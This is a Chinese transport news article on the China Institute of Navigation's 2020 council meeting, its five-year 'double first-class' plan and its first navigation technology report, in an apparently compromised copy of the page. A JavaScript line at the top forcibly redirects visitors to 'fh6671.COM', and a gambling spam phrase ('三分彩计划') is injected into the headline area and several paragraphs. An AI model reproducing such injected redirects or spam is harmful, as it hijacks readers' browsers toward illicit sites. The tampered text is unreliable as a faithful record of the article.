function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 要闻

中国航海学会推进“双一流”建设

2020-11-17 16:42:51 来源:中国交通新闻网 作者:​记者 王肖丰 通讯员 陈诗君

三分彩计划11月16日至17日,中国航海学会第九届理事会第二次全体会议、2020年学术年会在广州召开。中国航海学会理事长何建中强调,深入学习贯彻党的十九届五中全会精神,扎实推进航海学会创建“双一流”目标(世界一流学会和一流科技期刊),不断推动航海科技创新,为建成科技强国、交通强国、海洋强国、航运强国提供有力支撑。

中国航海学会理事、专家委员会、分支机构,以及地方航海学会、相关部门代表参加会议和学术交流活动。

5年基本建成“双一流”科技社团

九届二次理事会议审议通过了《中国航海学会创建“双一流”(2020-2024)行动方案》(简称《方案》)。《方案》提出,用5年左右时间,基本建成创新引领、行业倚重、社会信任、会员满意的“双一流”科技社团,并明确提出了八项重点任务:深化学会改革与创新能力建设,全面推进学会治理能力和治理体系现代化;打造学术活动品牌,提升学术引领力和影响力;建设中国航海智库品牌,主动服务国家战略;建设世界一流科技期刊,构建与创新型国家相适应的科技期刊发展体系;打造科技奖励、评价、认证品牌,提升科技社会化服务能力;拓展和完善国际交流合作机制,构建国际航海领域命运共同体;推进现代科普体系建设,传承弘扬优秀航海文化;完善会员发展和服务体系,打造科技工作者之家。

何建中强调,要针对《方案》提出的主要任务,采取切实有效的落实举措,重点在六个方面取得新成效。一是航海科技服务开创新局面。要完善航海科技成果评价奖励体系,构建产、学、研、用深度融合“航海科创”平台,打造社会化公共服务品牌,重点扶持、加快培养航海领域科技领军人才;二是学术活动品牌达到新水平。要打造世界知名的学术活动品牌,创建世界一流的科技期刊。把中国航海日论坛打造成世界知名的学术活动品牌,筹办高水平的中国航海学术年会,对标世界一流科技期刊,办好《中国航海》《航海技术》;三是航海智库影响力得到新提高。要创建国际权威智库品牌,深化航海智库品牌创新模式,明确智库研究重点选题,打造智库交流合作平台,完善智库建设配套措施;四是国际合作联盟取得新突破。要积极参与国际组织治理,重点做好国际航行学会联合会相关工作;以“一带一路”国际港航科技联盟项目为抓手,深化国际合作机制;依托亚洲航海学术年会,形成区域性发展合力;五是航海文化建设迈上新台阶。要加强青少年航海教育,弘扬航海文化,建立一批具有广泛影响力的航海教育科普基地,践行新时代航海精神;六是学会治理效能得到新提升。要加强党对学会的全面领导,深化改革,不断提升学会现代化治理能力和水平,建立完善联系广泛、服务基层的工作体系。

中国航海科技发展报告首发

三分彩计划学术年会期间,中国航海学会第一次发布《中国航海科技发展报告(2020)》(简称《报告》)。据学会常务副理事长张宝晨介绍,《报告》包括总报告和船舶驾驶、船舶机电、航海保障领域、通信导航与遥感、航道工程与运行、港口建设与运行、货物运输与安全、管理与服务、政策与法规、监管、航海教育与文化等11个分报告。《报告》总结了“十三五”时期我国航海领域主要科技进展,就国内外航海科技发展进行了比较,分析了存在的差距和原因,展望了未来五年或更长时间航海科技发展趋势,并提出了我国的发展策略和措施建议。

改革开放以来,我国航海事业高速发展,海运承担了我国90%以上外贸货物运输,我国港口吞吐量、船员规模已稳居世界第一,船队规模位居世界第二,航海领域科技创新能力大幅提升。在重大水工工程、集装箱全自动化码头、绿色航运、智能航运等众多领域取得了瞩目的成就,有些技术已处于国际先进水平。但是,我国的航海科技总体上仍处于世界跟跑阶段,有些领域的核心技术还未实现自主可控,“卡脖子”的问题还比较突出。因此,我国仍然不是航海技术强国,与世界航海技术领先国家水平相比,核心关键技术的制约是我国走向航海技术强国的根本障碍。

三分彩计划《报告》指出,21世纪是海洋的世纪,未来5至30年将是航海科技大发展、大变革时期,人工智能、大数据、云计算、现代信息通信等新技术,将推动航海业转型和新一轮技术发展。我国应抓住时代机遇,坚定“四个自信”,充分发挥和积累优势,强化顶层设计和战略布局,推动政产学用协同合作,提升核心关键技术创新能力,促进行业高质量发展,为海洋强国、科技强国和交通强国建设提供坚实的航海科技支撑。

弘扬科学家精神和工匠精神

三分彩计划此次学术年会,首次集体表彰了中国航海科技奖优秀团队和个人。中国航海学会航海科学技术奖包括航海科技奖、青年科技奖、科技突出贡献奖、优秀科技论文奖、技术发明奖、科普奖等,是中国航海领域覆盖面最广、影响力最大、水平最高的科技奖项,很多获奖项目的关键技术都达到国际先进或领先水平。2019年度航海科技奖获奖项目共70个。

何建中强调,要弘扬科学家精神和工匠精神,增强创新意识;要围绕国家重大战略实施,增强责任意识,积极推进综合交通“多规合一”“多规融合”,积极推进航海领域数字化转型发展,积极推进“新基建”支撑“四网”融合发展,积极推进交通治理体系和治理能力现代化;要推动建立产、学、研、用为一体的“航海科创”平台,积极推动协同创新,大力托举青年人才,积极研究提出有效的政策意见和建议。

三分彩计划据悉,会议期间,通过线上线下相结合的形式组织了优秀学术论文交流会;中国航海学会联合招商局集团举办了“数字化时代港航物流发展论坛”;举办了航海科技成果展。

中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。